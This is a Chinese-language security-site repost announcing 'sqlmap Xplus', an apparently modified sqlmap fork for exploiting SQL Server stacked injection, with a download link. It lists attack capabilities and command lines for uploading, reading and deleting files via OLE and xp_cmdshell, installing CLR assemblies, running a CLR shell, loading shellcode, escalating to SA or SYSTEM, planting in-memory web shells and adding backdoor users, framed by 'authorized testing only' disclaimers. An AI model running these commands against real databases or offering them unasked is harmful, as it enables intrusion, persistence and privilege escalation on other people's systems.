工具集:sqlmap Xplus 【基于 sqlmap,对经典的数据库注入漏洞利用工具进行二开】

admin
admin
admin
145368
文章
119
评论
2025年6月7日12:54:28工具集:sqlmap Xplus 【基于 sqlmap,对经典的数据库注入漏洞利用工具进行二开】已关闭评论23 views字数 2713阅读9分2秒阅读模式
声明:仅用于授权测试,用户滥用造成的一切后果和作者无关 请遵守法律法规!【文末获取工具】

0x01 工具介绍

在众多的地区性攻防演练中,SQL Server数据库堆叠注入仍有较高的爆洞频率,但因为一些常见的演练场景限制,如不出网、低权限、站库分离、终端防护、上线困难、权限维持繁琐等,仅一个--os-shell已经难满足我们的需求。

sqlmapxplus 基于sqlmap,对经典的数据库漏洞利用工具进行二开,参考各种解决方法,增加MSSQL数据库注入的利用方式。

目前已经完成的功能如下

①OLE文件上传

OLE 自动化过程允许你通过 SQL Server 调用 COM 对象,从而可以控制系统中的某些功能,比如文件操作、网络请求

②xpcmdshell文件上传

xp_cmdshell 是 MSSQL 提供的一个扩展存储过程,它允许你在数据库中执行系统命令,这就相当于“拿到了系统的命令执行能力”。

③CLR安装功能

CLR是MSSQL 支持托管的 .NET 代码执行,通过 CLR程序集。攻击者可以上传一个自定义的 .NET 程序集,并注册为 SQL 函数或存储过程。此时攻击者就可以可以执行任意 .NET 代码,包括:下载文件、执行 Shellcode、创建用户、打开 RDP 等系统服务

此外,sqlmap Xplus还支持内存马上传、能够实现mssql注入场景下的自动化注入内存马、自动化提权、自动化添加后门用户、自动化远程文件下载、自动化shellcode加载功能。

0x02 工具使用

新增功能汇总:

File system access:--xp-upload   upload file by xp_cmdshell --ole-upload  upload file by ole --check-file  use xp_fileexis check file exist --ole-del    delete file by ole --ole-read    read file content by ole --ole-move    move file by ole --ole-copy    copy file by ole Operating system access:--enable-clr        enable clr --disable-clr       disable clr--enable-ole        enable ole --check-clr   check user-defined functions in the database--del-clr   delete user-defined functions in the database--install-clr1      install clr1--install-clr2      install clr2--clr-shell         clr shell --to-sa             current db to sa--sharpshell-upload1  sharpshell upload1--sharpshell-upload2  sharpshell upload2 
工具集:sqlmap Xplus 【基于 sqlmap,对经典的数据库注入漏洞利用工具进行二开】

文件操作功能:

# 开启 ole 利用功能python sqlmap.py -r/-u xxx --enable-ole # 通过 ole 上传文件python sqlmap.py -r/-u xxx --ole-upload local_file_path --file-dest remote_file_path# 通过 ole 删除指定文件python sqlmap.py -r/-u xxx --ole-del remote_file_path# 通过 ole 阅读指定文件python sqlmap.py -r/-u xxx --ole-read remote_file_path# 通过 ole 移动并重命名文件python sqlmap.py -r/-u xxx --ole-move remote_file_path1 --file-dest remote_file_path# 通过 ole 复制文件python sqlmap.py -r/-u xxx --ole-copy remote_file_path1 --file-dest remote_file_path2# 通过 xp_cmdshell 上传文件python sqlmap.py -r/-u xxx --xp-upload local_file_path --file-dest remote_file_path# 使用 xp_fileexis 来检查文件是否存在python sqlmap.py -r/-u xxx --check-file remote_file_path# 通过 ole 实现的HttpListener内存马上传方式# 默认上传至c:\Windows\tasks\listen.tmp.txt,需要以system权限运行python sqlmap.py -r/-u xxx --sharpshell-upload2 # 通过 xp_cmdshell实现的HttpListener内存马上传方式# 默认上传至c:\Windows\tasks\listen.tmp.txt,需要以system权限运行python sqlmap.py -r/-u xxx --sharpshell-upload1 

CLR相关的功能

# 开启 clr 利用功能python sqlmap.py -r/-u xxx --enable-clr # 关闭 clr 利用功能python sqlmap.py -r/-u xxx --disable-clr# 查询数据库中是否存在用户自定义函数python sqlmap.py -r/-u xxx --check-clr# 进入 clr 安装模式python sqlmap.py -r/-u xxx --install-clr# 进入 clr-shell 命令交互模式python sqlmap.py -r/-u xxx --clr-shell # 删除用户自定义函数python sqlmap.py -r/-u xxx --del-clr# clr dll 参考如下,更多其他dll请参考星球获取# 存储过程类名Xplus,存储过程函数名需要注意大小写,分别为# ClrExec、ClrEfsPotato、ClrDownload、ClrShellcodeLoader# 对应项目目录下单独功能的dll,分别为clrexec.dllclrefspotato.dllclrdownload.dllclrshellcodeloader.dl

更多利用场景请查看coolcat佬文章:https://mp.weixin.qq.com/s/6RpxXitEPt8rA1DFb56Oxw 写的非常细致

0x03 工具下载

https://github.com/co01cat/SqlmapXPlus

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月7日12:54:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   工具集:sqlmap Xplus 【基于 sqlmap,对经典的数据库注入漏洞利用工具进行二开】https://cn-sec.com/archives/4144044.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.